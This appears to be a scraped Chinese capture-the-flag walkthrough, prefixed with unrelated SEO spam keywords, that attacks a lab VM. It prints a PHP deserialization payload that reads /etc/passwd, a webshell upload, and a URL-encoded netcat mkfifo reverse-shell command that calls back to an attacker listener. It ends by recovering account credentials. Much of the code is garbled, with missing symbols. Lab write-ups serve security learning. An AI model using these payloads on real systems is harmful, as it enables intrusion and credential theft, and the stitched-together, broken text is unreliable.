北京网站制作团队,邢台网站建设58,设计公司logo图标,网址怎么申请网站扫描ip,找到靶机ip后进入 他说这是cookie的测试网页#xff0c;我们抓个包#xff0c;得到cookie值 base64解码 扫描一下靶机ip的目录 发现http://192.168.88.153/backup/#xff0c;访问
下载一下发现是他的网页源码 通过代码审计#xff0c;发现
通过代码审计得知…扫描ip,找到靶机ip后进入 他说这是cookie的测试网页我们抓个包得到cookie值 base64解码 扫描一下靶机ip的目录 发现http://192.168.88.153/backup/访问
下载一下发现是他的网页源码 通过代码审计发现
通过代码审计得知首先index.php文件包含了user.class.php文件对cookie中的user参数进行了序列化和base64编码然后user.class.php文件包含了log.class.php且定义了两个类分别是Welcome和User并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log且handler函数对变量还进行了文件包含和输出。
构造payload
?phpclass Log {private $type_log /etc/passwd;}class User {private $name admin;private $wel;function __construct() {$this-wel new Log();}
}
$obj new User();
echo base64_encode(serialize($obj));
?
获取到base64编码后的字节序列 抓包将编码后的数据抓包后替换 放包
查看到passwd 写一个1.txt,内容为 修改palyload为
访问99.php 在攻击模块中替换并查询ip 成功执行
开始反弹shell
rm/tmp/f%3bmkfifo/tmp/f%3bcat/tmp/f|/bin/sh-i2%261|nc192.168.0.1024444/tmp/f 上述代码是特定url编码后的填入参数位置在kali里开启监听 在攻击模块发送 成功获取shell
查看文件多返回几次上级目录找到一个txt文件 查看文件 得到sk4账号密码 远程连接
